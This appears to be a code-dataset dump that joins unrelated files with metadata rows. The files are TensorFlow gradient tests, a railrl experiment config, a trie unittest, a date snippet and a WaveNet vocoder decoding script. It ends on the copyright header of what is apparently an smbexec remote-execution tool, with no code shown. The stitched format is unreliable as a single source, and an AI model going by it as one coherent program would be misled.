  def _xlogy_gradients(self, x, y):
    # Evaluate d xlogy / dx and d xlogy / dy separately.
    gx = self.evaluate(gradients.gradients(math_ops.xlogy(x, y), x)[0])
    gy = self.evaluate(gradients.gradients(math_ops.xlogy(x, y), y)[0])
    return gx, gy

  @test_util.run_deprecated_v1
  def testNonZeroValuesGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0.1, dtype=dtype)
      y = constant_op.constant(3.1, dtype=dtype)
      gx, gy = self._xlogy_gradients(x, y)
      self.assertAllClose(self.evaluate(math_ops.log(y)), gx)
      self.assertAllClose(self.evaluate(x / y), gy)

  @test_util.run_deprecated_v1
  def testZeroXGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0., dtype=dtype)
      y = constant_op.constant(3.1, dtype=dtype)
      gx, gy = self._xlogy_gradients(x, y)
      zero = self.evaluate(x)
      self.assertAllClose(zero, gx)
      self.assertAllClose(zero, gy)

  @test_util.run_deprecated_v1
  def testZeroYGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0.1, dtype=dtype)
      y = constant_op.constant(0., dtype=dtype)
      gx, gy = self._xlogy_gradients(x, y)
      self.assertAllClose(-np.inf, gx)
      self.assertAllClose(np.inf, gy)

  @test_util.run_deprecated_v1
  def testZeroXYGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0., dtype=dtype)
      y = constant_op.constant(0., dtype=dtype)
      gx, gy = self._xlogy_gradients(x, y)
      zero = self.evaluate(x)
      self.assertAllClose(zero, gx)
      self.assertAllClose(zero, gy)
class Xlog1pyTest(test.TestCase):
  """Gradient tests for xlog1py, including the x == 0 convention."""

  def _xlog1py_gradients(self, x, y):
    # Evaluate d xlog1py / dx and d xlog1py / dy separately.
    gx = self.evaluate(
        gradients.gradients(math_ops.xlog1py(x, y), x)[0])
    gy = self.evaluate(
        gradients.gradients(math_ops.xlog1py(x, y), y)[0])
    return gx, gy

  @test_util.run_deprecated_v1
  def testNonZeroValuesGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0.1, dtype=dtype)
      y = constant_op.constant(3.1, dtype=dtype)
      gx, gy = self._xlog1py_gradients(x, y)
      self.assertAllClose(self.evaluate(math_ops.log1p(y)), gx)
      self.assertAllClose(self.evaluate(x / (1. + y)), gy)

  @test_util.run_deprecated_v1
  def testZeroXGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0., dtype=dtype)
      y = constant_op.constant(3.1, dtype=dtype)
      gx, gy = self._xlog1py_gradients(x, y)
      zero = self.evaluate(x)
      self.assertAllClose(zero, gx)
      self.assertAllClose(zero, gy)

  @test_util.run_deprecated_v1
  def testNegOneYGrad(self):
    # y == -1 is the singularity of log1p.
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0.1, dtype=dtype)
      y = constant_op.constant(-1., dtype=dtype)
      gx, gy = self._xlog1py_gradients(x, y)
      self.assertAllClose(-np.inf, gx)
      self.assertAllClose(np.inf, gy)

  @test_util.run_deprecated_v1
  def testZeroXNegOneYGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0., dtype=dtype)
      y = constant_op.constant(-1., dtype=dtype)
      gx, gy = self._xlog1py_gradients(x, y)
      zero = self.evaluate(x)
      self.assertAllClose(zero, gx)
      self.assertAllClose(zero, gy)
class XdivyTest(test.TestCase):
  """Gradient tests for xdivy, including the x == 0 convention."""

  def _xdivy_gradients(self, x, y):
    # Evaluate d xdivy / dx and d xdivy / dy separately.
    gx = self.evaluate(gradients.gradients(math_ops.xdivy(x, y), x)[0])
    gy = self.evaluate(gradients.gradients(math_ops.xdivy(x, y), y)[0])
    return gx, gy

  @test_util.run_deprecated_v1
  def testNonZeroValuesGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0.1, dtype=dtype)
      y = constant_op.constant(3.1, dtype=dtype)
      gx, gy = self._xdivy_gradients(x, y)
      self.assertAllClose(self.evaluate(1 / y), gx)
      self.assertAllClose(self.evaluate(-x / y**2), gy)

  @test_util.run_deprecated_v1
  def testZeroXGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0., dtype=dtype)
      y = constant_op.constant(3.1, dtype=dtype)
      gx, gy = self._xdivy_gradients(x, y)
      zero = self.evaluate(x)
      self.assertAllClose(zero, gx)
      self.assertAllClose(zero, gy)

  @test_util.run_deprecated_v1
  def testZeroYGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0.1, dtype=dtype)
      y = constant_op.constant(0., dtype=dtype)
      gx, gy = self._xdivy_gradients(x, y)
      self.assertAllClose(np.inf, gx)
      self.assertAllClose(-np.inf, gy)

  @test_util.run_deprecated_v1
  def testZeroXYGrad(self):
    for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
      x = constant_op.constant(0., dtype=dtype)
      y = constant_op.constant(0., dtype=dtype)
      gx, gy = self._xdivy_gradients(x, y)
      zero = self.evaluate(x)
      self.assertAllClose(zero, gx)
      self.assertAllClose(zero, gy)
@test_util.run_all_in_graph_and_eager_modes
class PowGradTest(test.TestCase):
  """Checks the gradient of pow at zero (and nearby points)."""

  def test_zero_grad_tf_gradients(self):
    if context.executing_eagerly():
      self.skipTest("tf.gradients not supported in eager.")
    x = constant_op.constant([-1., 0., 1.])
    grad = self.evaluate(gradients.gradients(math_ops.pow(x, 2), x)[0])
    self.assertAllClose([-2., 0., 2.], grad)

  def test_zero_grad_tape(self):
    try:
      # Numerics checking would flag NaN/Inf if the x == 0 gradient were bad.
      check_numerics_callback.enable_check_numerics()
      x = constant_op.constant([-1, 0., 1.])
      with backprop.GradientTape() as tape:
        tape.watch(x)
        grad = tape.gradient(math_ops.pow(x, 2), x)
      grad = self.evaluate(grad)
      self.assertAllClose([-2., 0., 2.], grad)
    finally:
      check_numerics_callback.disable_check_numerics()
@test_util.run_all_in_graph_and_eager_modes
class NextAfterTest(test.TestCase):
  """Gradient tests for nextafter: d/dx1 == 1 and d/dx2 == 0."""

  def _nextafter_gradient(self, x1, x2):
    with backprop.GradientTape() as tape:
      tape.watch(x1)
      tape.watch(x2)
      out = math_ops.nextafter(x1, x2)
    return tape.gradient(out, [x1, x2])

  def testBasic(self):
    for dtype in (dtypes.float32, dtypes.float64):
      x1 = constant_op.constant(0.1, dtype=dtype)
      x2 = constant_op.constant(3.1, dtype=dtype)
      dx1, dx2 = self._nextafter_gradient(x1, x2)
      self.assertAllClose(constant_op.constant(1, dtype=dtype), dx1)
      self.assertAllClose(constant_op.constant(0, dtype=dtype), dx2)

  def testDynamicShapes(self):
    # Same expectations when the static shape is unknown.
    for dtype in (dtypes.float32, dtypes.float64):
      default_x1 = constant_op.constant(0.1, dtype=dtype)
      default_x2 = constant_op.constant(3.1, dtype=dtype)
      x1 = array_ops.placeholder_with_default(default_x1, shape=None)
      x2 = array_ops.placeholder_with_default(default_x2, shape=None)
      dx1, dx2 = self._nextafter_gradient(x1, x2)
      self.assertAllClose(constant_op.constant(1, dtype=dtype), dx1)
      self.assertAllClose(constant_op.constant(0, dtype=dtype), dx2)

  def testWithGradientChecker(self):
    for dtype in (dtypes.float32, dtypes.float64):
      with self.cached_session():
        x1 = np.array([-1, 0, 1, 2, 3], dtype=dtype.as_numpy_dtype)
        x2 = np.array([2, 2, 2, 2, 2], dtype=dtype.as_numpy_dtype)
        err = gradient_checker_v2.max_error(
            *gradient_checker_v2.compute_gradient(
                lambda x: math_ops.nextafter(x, x2), [x1]))  # pylint: disable=cell-var-from-loop
        self.assertLess(err, 1e-3)

  def testBroadcastingWithGradientChecker(self):
    for dtype in (dtypes.float32, dtypes.float64):
      with self.cached_session():
        x1 = np.array([-1, 0, 1, 2, 3], dtype=dtype.as_numpy_dtype)
        x2 = np.array([2], dtype=dtype.as_numpy_dtype)
        err = gradient_checker_v2.max_error(
            *gradient_checker_v2.compute_gradient(
                lambda x: math_ops.nextafter(x, x2), [x1]))  # pylint: disable=cell-var-from-loop
        self.assertLess(err, 1e-3)
if __name__ == "__main__":
test.main()
| 39.699552
| 97
| 0.680108
|
4a07d2a4ce8c4b81c551dea0466994b0ceeade50
| 4,127
|
py
|
Python
|
experiments/vitchyr/rig/reset-free/pusher_xyz_many_objs/online_vae.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
experiments/vitchyr/rig/reset-free/pusher_xyz_many_objs/online_vae.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
experiments/vitchyr/rig/reset-free/pusher_xyz_many_objs/online_vae.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
import railrl.misc.hyperparameter as hyp
from multiworld.envs.mujoco.cameras import sawyer_pusher_camera_upright_v2
from multiworld.envs.mujoco.sawyer_xyz.sawyer_push_many_env import (
SawyerPushManyXyEnv,
)
from railrl.launchers.launcher_util import run_experiment
from railrl.torch.grill.launcher import grill_her_td3_online_vae_full_experiment
import railrl.torch.vae.vae_schedules as vae_schedules
if __name__ == "__main__":
variant = dict(
double_algo=False,
env_class=SawyerPushManyXyEnv,
env_kwargs=dict(
hide_goal_markers=True,
reset_free=False,
randomize_num_objects=False,
),
init_camera=sawyer_pusher_camera_upright_v2,
grill_variant=dict(
save_video=True,
online_vae_beta=2.5,
save_video_period=250,
qf_kwargs=dict(
hidden_sizes=[400, 300],
),
policy_kwargs=dict(
hidden_sizes=[400, 300],
),
algo_kwargs=dict(
base_kwargs=dict(
num_epochs=1000,
num_steps_per_epoch=1000,
num_steps_per_eval=5000,
min_num_steps_before_training=4000,
batch_size=128,
max_path_length=100,
discount=0.99,
num_updates_per_env_step=2,
),
td3_kwargs=dict(
tau=1e-2,
),
online_vae_kwargs=dict(
vae_training_schedule=vae_schedules.every_six,
oracle_data=False,
vae_save_period=25,
),
),
replay_kwargs=dict(
max_size=int(30000),
fraction_goals_are_rollout_goals=0.,
fraction_resampled_goals_are_env_goals=0.5,
exploration_rewards_scale=0.0,
exploration_rewards_type='reconstruction_error',
alpha=3,
),
algorithm='GRILL-HER-TD3',
normalize=False,
render=False,
exploration_noise=0.8,
exploration_type='ou',
training_mode='train',
testing_mode='test',
reward_params=dict(
type='latent_distance',
),
observation_key='latent_observation',
desired_goal_key='latent_desired_goal',
),
train_vae_variant=dict(
representation_size=16,
beta=1.0,
num_epochs=0,
generate_vae_dataset_kwargs=dict(
N=100,
test_p=.9,
oracle_dataset=True,
use_cached=False,
num_channels=3,
),
vae_kwargs=dict(
input_channels=3,
),
algo_kwargs=dict(
do_scatterplot=False,
use_linear_dynamics=False,
lr=1e-3,
),
save_period=5,
),
version='easy-env',
)
search_space = {
'env_kwargs.num_resets_before_puck_reset': [1],
'grill_variant.algo_kwargs.base_kwargs.max_path_length': [500],
'grill_variant.replay_kwargs.power': [3],
}
sweeper = hyp.DeterministicHyperparameterSweeper(
search_space, default_parameters=variant,
)
n_seeds = 1
mode = 'local'
exp_prefix = 'dev'
n_seeds = 3
mode = 'ec2'
exp_prefix = 'vitchyr-sawyer-multipush-xy-online-reset-hand-with-puck' \
'-broken-sample-goals-still'
for exp_id, variant in enumerate(sweeper.iterate_hyperparameters()):
for _ in range(n_seeds):
run_experiment(
grill_her_td3_online_vae_full_experiment,
exp_prefix=exp_prefix,
mode=mode,
variant=variant,
use_gpu=True,
snapshot_gap=200,
snapshot_mode='gap_and_last',
num_exps_per_instance=2,
)
| 33.282258
| 80
| 0.542767
|
4a07d355293680de3d819e97122de65349434919
| 592
|
py
|
Python
|
tests/test_trie.py
|
scottwedge/Python-Datastructures
|
3ea489ac54c64d57fe25d974250bf19fa5f8898d
|
[
"MIT"
] | null | null | null |
tests/test_trie.py
|
scottwedge/Python-Datastructures
|
3ea489ac54c64d57fe25d974250bf19fa5f8898d
|
[
"MIT"
] | null | null | null |
tests/test_trie.py
|
scottwedge/Python-Datastructures
|
3ea489ac54c64d57fe25d974250bf19fa5f8898d
|
[
"MIT"
] | null | null | null |
import unittest
from python_datastructures.trie import Trie
class Test_Trie(unittest.TestCase):
    """Behavioral tests for the Trie data structure."""

    def setUp(self):
        # A fresh trie holding four words before every test.
        words = ['apple', 'app', 'android', 'and']
        self.trie = Trie()
        self.trie.build(words)

    def test_add(self):
        self.trie.add("amazon")
        self.assertEqual(self.trie.wordcount, 5)

    def test_contains(self):
        for word, expected in (("app", True), ("amazon", False), ("ap", True)):
            self.assertEqual(self.trie.contains(word), expected)
if __name__ == "__main__":
unittest.main()
| 23.68
| 61
| 0.641892
|
4a07d3c52852ea729f862476ab0c3adb5fc47adb
| 157
|
py
|
Python
|
01_Language/01_Functions/python/date_date_set.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 3
|
2020-06-28T07:42:51.000Z
|
2021-01-15T10:32:11.000Z
|
01_Language/01_Functions/python/date_date_set.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 9
|
2021-03-10T22:45:40.000Z
|
2022-02-27T06:53:20.000Z
|
01_Language/01_Functions/python/date_date_set.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 1
|
2021-01-15T10:51:24.000Z
|
2021-01-15T10:51:24.000Z
|
# coding: utf-8
import datetime

if __name__ == '__main__':
    # Take the current timestamp, pin the date portion to 2001-02-03, and
    # print only the date.
    moment = datetime.datetime.now()
    moment = moment.replace(year=2001, month=2, day=3)
    print(moment.strftime("%Y-%m-%d"))
| 17.444444
| 33
| 0.598726
|
4a07d4916f78db80fac2c116e5cc938e01dadfbb
| 15,729
|
py
|
Python
|
decode.py
|
exeex/PytorchWaveNetVocoder
|
c21556026ebeac4fdb9e2f4ccb707d7db23114f2
|
[
"Apache-2.0"
] | null | null | null |
decode.py
|
exeex/PytorchWaveNetVocoder
|
c21556026ebeac4fdb9e2f4ccb707d7db23114f2
|
[
"Apache-2.0"
] | null | null | null |
decode.py
|
exeex/PytorchWaveNetVocoder
|
c21556026ebeac4fdb9e2f4ccb707d7db23114f2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import argparse
import logging
import math
import os
import sys
import numpy as np
import soundfile as sf
import torch
import torch.multiprocessing as mp
from sklearn.preprocessing import StandardScaler
from torchvision import transforms
from torchvision import transforms
from wavenet_vocoder.nets.wavenet_utils import decode_mu_law
from wavenet_vocoder.nets.wavenet_utils import encode_mu_law
from wavenet_vocoder.nets import WaveNet
from wavenet_vocoder.nets.wavenet_pulse import WaveNetPulse
from wavenet_vocoder.utils import extend_time
from wavenet_vocoder.utils import find_files
from wavenet_vocoder.utils import read_hdf5
from wavenet_vocoder.utils import read_txt
from wavenet_vocoder.utils import shape_hdf5
from dataset import p_trans_binary, p_trans_binary_multi_channel
from functools import partial
import pulse_world.pyworld as pw
def shift_semi_tone_f0_pulse(f0, shift=2):
    """Shift an F0 contour by a number of semitones, in place.

    Args:
        f0 (ndarray): F0 contour in Hz; modified in place. Unvoiced frames
            (value 0) remain 0 after scaling.
        shift (int or float): Semitones to shift; may be negative. A shift
            of 12 doubles the frequency.

    Returns:
        ndarray: The same array object, scaled by 2 ** (shift / 12).
    """
    freq_scale = 2 ** (shift / 12)
    # Slice-assign so callers holding a reference to f0 observe the shift.
    f0[:] = f0 * freq_scale
    return f0
def pad_list(batch_list, pad_value=0.0):
    """Pad a list of (T_i, C) arrays into a single (B, T_max, C) batch.

    Args:
        batch_list (list): List of batch, where the shape of i-th batch (T_i, C).
        pad_value (float): Value to pad.

    Returns:
        ndarray: Padded batch with the shape (B, T_max, C).
    """
    batch_size = len(batch_list)
    maxlen = max(batch.shape[0] for batch in batch_list)
    n_feats = batch_list[0].shape[-1]
    # BUG FIX: the original always zero-filled via np.zeros, silently
    # ignoring pad_value; np.full honors the requested fill value.
    batch_pad = np.full((batch_size, maxlen, n_feats), pad_value)
    for idx, batch in enumerate(batch_list):
        batch_pad[idx, :batch.shape[0]] = batch

    return batch_pad
def pad_along_axis(array: np.ndarray, target_length, axis=0):
    """Zero-pad (or truncate) an array to target_length along one axis.

    Padding is appended at the end of the axis; if the array is already
    longer than target_length it is truncated instead.
    """
    current = array.shape[axis]
    if current > target_length:
        # Longer than requested: keep only the leading target_length entries.
        return array.take(indices=range(target_length), axis=axis)
    pad_width = [(0, 0)] * len(array.shape)
    pad_width[axis] = (0, target_length - current)
    return np.pad(array, pad_width=pad_width, mode='constant', constant_values=0)
def decode_generator(feat_list,
                     batch_size=32,
                     feature_type="world",
                     wav_transform=None,
                     feat_transform=None,
                     pulse_transform=p_trans_binary_multi_channel,
                     upsampling_factor=80,
                     use_upsampling_layer=True,
                     use_speaker_code=False,
                     use_pulse=True,
                     f0_transform=None, ):
    """GENERATE DECODING BATCH.

    Args:
        feat_list (list): List of feature files.
        batch_size (int): Batch size in decoding.
        feature_type (str): Feature type.
        wav_transform (func): Preprocessing function for waveform.
        feat_transform (func): Preprocessing function for aux feats.
        pulse_transform (func): Preprocessing function for the pulse signal.
        upsampling_factor (int): Upsampling factor.
        use_upsampling_layer (bool): Whether to use upsampling layer.
        use_speaker_code (bool): Whether to use speaker code.
        use_pulse (bool): Whether to drop the second aux-feat column before
            batching (the pulse signal is fed separately).
        f0_transform (func): Optional transform applied to the stored F0
            contour; when given, the pulse train is re-synthesized from the
            transformed F0 instead of loaded from the file.

    Returns:
        generator: Generator instance.

    NOTE(review): when f0_transform is given, this function reads the
    module-global ``args`` (args.fs, args.shiftms) — presumably it is only
    called after parse_args() has run; confirm against the caller.
    """
    # ---------------------------
    # sample-by-sample generation
    # ---------------------------
    if batch_size == 1:
        raise NotImplementedError
    # ----------------
    # batch generation
    # ----------------
    else:
        # sort with the feature length
        shape_list = [shape_hdf5(f, "/" + feature_type)[0] for f in feat_list]
        idx = np.argsort(shape_list)
        feat_list = [feat_list[i] for i in idx]

        # divide into batch list
        n_batch = math.ceil(len(feat_list) / batch_size)
        batch_lists = np.array_split(feat_list, n_batch)
        batch_lists = [f.tolist() for f in batch_lists]

        for batch_list in batch_lists:
            batch_x = []
            batch_h = []
            batch_p = []
            n_samples_list = []
            feat_ids = []
            for featfile in batch_list:
                # make seed waveform and load aux feature
                x = np.zeros((1))
                h = read_hdf5(featfile, "/" + feature_type)
                if f0_transform is not None:
                    # re-synthesize the pulse train from the transformed F0
                    f0 = read_hdf5(featfile, "/" + 'world_f0')
                    f0 = f0_transform(f0)
                    fs = args.fs
                    p = pw.synthesize_pulse_new(f0, fs, frame_period=args.shiftms).astype(np.int32)
                    # sanity check: re-synthesized pulse keeps the stored length
                    __p = read_hdf5(featfile, "/" + 'world_pulse')
                    assert len(p) == len(__p)
                else:
                    p = read_hdf5(featfile, "/" + 'world_pulse')
                if pulse_transform is not None:
                    p = pulse_transform(p)
                    # transformed pulse is expected to be (multi-)binary
                    assert p.max() <= 1.0
                if not use_upsampling_layer:
                    h = extend_time(h, upsampling_factor)
                if use_speaker_code:
                    sc = read_hdf5(featfile, "/speaker_code")
                    sc = np.tile(sc, [h.shape[0], 1])
                    h = np.concatenate([h, sc], axis=1)

                # perform pre-processing
                if wav_transform is not None:
                    x = wav_transform(x)
                if feat_transform is not None:
                    h = feat_transform(h)

                if use_pulse:
                    h = np.concatenate([h[:, 0:1], h[:, 2:]], axis=1)  # remove cont_f0_lpf

                # append to list
                batch_x += [x]
                batch_h += [h]
                batch_p += [p]
                if not use_upsampling_layer:
                    n_samples_list += [h.shape[0] - 1]
                else:
                    n_samples_list += [h.shape[0] * upsampling_factor - 1]
                feat_ids += [os.path.basename(featfile).replace(".h5", "")]

            # convert list to ndarray; pulses are right-padded to the longest
            # pulse in the batch before stacking
            batch_x = np.stack(batch_x, axis=0)
            len_p_max = max([len(p) for p in batch_p])
            batch_p = [pad_along_axis(p, len_p_max, axis=0) for p, n_sample in zip(batch_p, n_samples_list)]
            batch_p = np.stack(batch_p)
            batch_h = pad_list(batch_h)

            # convert to torch variable
            batch_x = torch.from_numpy(batch_x).long()  # B, 1
            batch_p = torch.from_numpy(batch_p).float().transpose(1, 2)  # B, C=1, T
            batch_h = torch.from_numpy(batch_h).float().transpose(1, 2)  # B, C, T(Frame)
            # print(batch_x.shape, batch_p.shape, batch_h.shape)

            # send to cuda
            if torch.cuda.is_available():
                batch_x = batch_x.cuda()
                batch_h = batch_h.cuda()
                batch_p = batch_p.cuda()

            yield feat_ids, (batch_x, batch_h, batch_p, n_samples_list)
# pulse
"""
--checkpoint /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/exp/pulse_repeat1_1227/checkpoint-200000.pkl
--feats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/hdf5/ev_slt
--outdir eva_out_pulse1228
--stats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/data/tr_slt/stats.h5
--config /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/exp/pulse_repeat1_1227/model.conf
--use_pulse
--f0_shift 0
"""
# no pulse repeat1
"""
--checkpoint /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat1/checkpoint-200000.pkl
--config /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat1/model.conf
--outdir eva_out_no_pulse
--feats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/hdf5/ev_slt
--stats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/data/tr_slt/stats.h5
"""
# no pulse repeat3
"""
--checkpoint /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat3/checkpoint-200000.pkl
--config /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat3/model.conf
--outdir eva_out_no_pulse_repeat3
--feats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/hdf5/ev_slt
--stats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/data/tr_slt/stats.h5
"""
def parse_args():
    """Build and parse the command-line arguments for decoding.

    Returns:
        argparse.Namespace: Parsed arguments.
    """
    parser = argparse.ArgumentParser()
    # decode setting
    parser.add_argument("--feats", required=True, type=str,
                        help="list or directory of aux feat files")
    parser.add_argument("--checkpoint", required=True, type=str,
                        help="model file")
    parser.add_argument("--outdir", required=True, type=str,
                        help="directory to save generated samples")
    parser.add_argument("--stats", default=None, type=str,
                        help="hdf5 file including statistics")
    parser.add_argument("--config", default=None, type=str,
                        help="configure file")
    parser.add_argument("--fs", default=16000, type=int,
                        help="sampling rate")
    parser.add_argument("--shiftms", default=5, type=float,
                        help="Frame shift in msec")
    parser.add_argument("--batch_size", default=32, type=int,
                        help="number of batch size in decoding")
    parser.add_argument("--n_gpus", default=1, type=int,
                        help="number of gpus")
    parser.add_argument("--use_pulse", default=False, action='store_true',
                        help="using pulse signal")
    parser.add_argument("--f0_shift", required=True, type=int,
                        help="f0 shift semi tone")
    # other setting
    parser.add_argument("--intervals", default=1000, type=int,
                        help="log interval")
    parser.add_argument("--seed", default=1, type=int,
                        help="seed number")
    parser.add_argument("--verbose", default=1, type=int,
                        help="log level")
    return parser.parse_args()
def main(args):
"""RUN DECODING."""
# set log level
if args.verbose > 0:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
else:
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
logging.warning("logging is disabled.")
# show arguments
for key, value in vars(args).items():
logging.info("%s = %s" % (key, str(value)))
# check arguments
if args.stats is None:
args.stats = os.path.dirname(args.checkpoint) + "/stats.h5"
if args.config is None:
args.config = os.path.dirname(args.checkpoint) + "/model.conf"
if not os.path.exists(args.stats):
raise FileNotFoundError("statistics file is missing (%s)." % (args.stats))
if not os.path.exists(args.config):
raise FileNotFoundError("config file is missing (%s)." % (args.config))
# check directory existence
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# fix seed
os.environ['PYTHONHASHSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# fix slow computation of dilated convargs.feats
# https://github.com/pytorch/pytorch/issues/15054#issuecomment-450191923
torch.backends.cudnn.benchmark = True
# load config
config = torch.load(args.config)
# get file list
if os.path.isdir(args.feats):
feat_list = sorted(find_files(args.feats, "*.h5"))
elif os.path.isfile(args.feats):
feat_list = read_txt(args.feats)
else:
logging.error("--feats should be directory or list.")
sys.exit(1)
# prepare the file list for parallel decoding
feat_lists = np.array_split(feat_list, args.n_gpus)
feat_lists = [f_list.tolist() for f_list in feat_lists]
# define transform
scaler = StandardScaler()
scaler.mean_ = read_hdf5(args.stats, "/" + config.feature_type + "/mean")
scaler.scale_ = read_hdf5(args.stats, "/" + config.feature_type + "/scale")
wav_transform = transforms.Compose([
lambda x: encode_mu_law(x, config.n_quantize)])
feat_transform = transforms.Compose([
lambda x: scaler.transform(x)])
f0_transform = transforms.Compose([partial(shift_semi_tone_f0_pulse, shift=args.f0_shift)])
# define gpu decode function
def gpu_decode(feat_list, gpu):
    """Decode the feature files in *feat_list* into waveforms on GPU *gpu*.

    Nested inside main(): closes over ``args``, ``config`` and the
    transform objects (``wav_transform``, ``feat_transform``,
    ``f0_transform``) defined above.
    """
    # set default gpu and do not track gradient
    torch.cuda.set_device(gpu)
    torch.set_grad_enabled(False)
    # define model and load parameters
    if config.use_upsampling_layer:
        upsampling_factor = config.upsampling_factor
    else:
        upsampling_factor = 0
    if args.use_pulse:
        _WaveNet = WaveNetPulse
    else:
        _WaveNet = WaveNet
    # NOTE(review): hard-coded override of the configured auxiliary feature
    # size — confirm 28 matches the checkpoint being loaded.
    config.n_aux = 28
    model = _WaveNet(
        n_quantize=config.n_quantize,
        n_aux=config.n_aux,
        n_resch=config.n_resch,
        n_skipch=config.n_skipch,
        dilation_depth=config.dilation_depth,
        dilation_repeat=config.dilation_repeat,
        kernel_size=config.kernel_size,
        upsampling_factor=upsampling_factor)
    # map_location keeps CPU-saved checkpoints loadable before .cuda() below
    model.load_state_dict(torch.load(args.checkpoint, map_location=lambda storage, loc: storage)["model"])
    model.eval()
    model.cuda()
    print(args.use_pulse)
    # define generator
    generator = decode_generator(
        feat_list,
        batch_size=args.batch_size,
        feature_type=config.feature_type,
        wav_transform=wav_transform,
        feat_transform=feat_transform,
        f0_transform=f0_transform,
        upsampling_factor=config.upsampling_factor,
        use_upsampling_layer=config.use_upsampling_layer,
        use_speaker_code=config.use_speaker_code,
        use_pulse=args.use_pulse)
    # decode batches and write one wav file per utterance id
    if args.batch_size > 1:
        for feat_ids, (batch_x, batch_h, batch_p, n_samples_list) in generator:
            logging.info("decoding start")
            samples_list = model.batch_fast_generate(
                batch_x, batch_h, n_samples_list, batch_p, intervals=args.intervals)
            for feat_id, samples in zip(feat_ids, samples_list):
                wav = decode_mu_law(samples, config.n_quantize)
                sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
                logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
    else:
        # single-sample generation path was never implemented
        raise NotImplementedError
# parallel decode
processes = []
for gpu, feat_list in enumerate(feat_lists):
p = mp.Process(target=gpu_decode, args=(feat_list, gpu,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
    args = parse_args()
    # The commented-out lines below are leftover single-run experiments for
    # feature extraction on a fixed data folder; kept for reference.
    # data_folder = '/home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/wav_hpf/tr_slt'
    #
    # filenames = os.listdir(data_folder)
    # # filenames = sorted(find_files(args.waveforms, "*.wav", use_dir_name=False))
    # print(filenames)
    #
    # data_folder = '/home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/wav_hpf/tr_slt'
    # args.hdf5dir = 'test'
    # args.wavdir = data_folder
    main(args)
    # wav_list = [os.path.join(data_folder, filename) for filename in filenames]
    # wav_list = wav_list[:2]
    # world_feature_extract(wav_list, args)
| 36.4942
| 114
| 0.610401
|
4a07d4fdb65e870f524bdfa87d9abe5d5ec73f34
| 13,971
|
py
|
Python
|
deps/smbexec1.py
|
IMULMUL/portia-1
|
2e6e608d926026ec63e151dfd23ea5bead9307bb
|
[
"Apache-2.0"
] | 514
|
2017-07-23T09:29:52.000Z
|
2022-03-30T16:45:01.000Z
|
deps/smbexec1.py
|
crypticterminal/portia-1
|
36b974a9f48fc73f1306640e85554c3ceda1c825
|
[
"Apache-2.0"
] | 9
|
2017-08-02T05:01:19.000Z
|
2018-12-27T14:40:26.000Z
|
deps/smbexec1.py
|
crypticterminal/portia-1
|
36b974a9f48fc73f1306640e85554c3ceda1c825
|
[
"Apache-2.0"
] | 137
|
2017-07-29T23:41:38.000Z
|
2022-03-21T03:50:03.000Z
|
#!/usr/bin/env python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
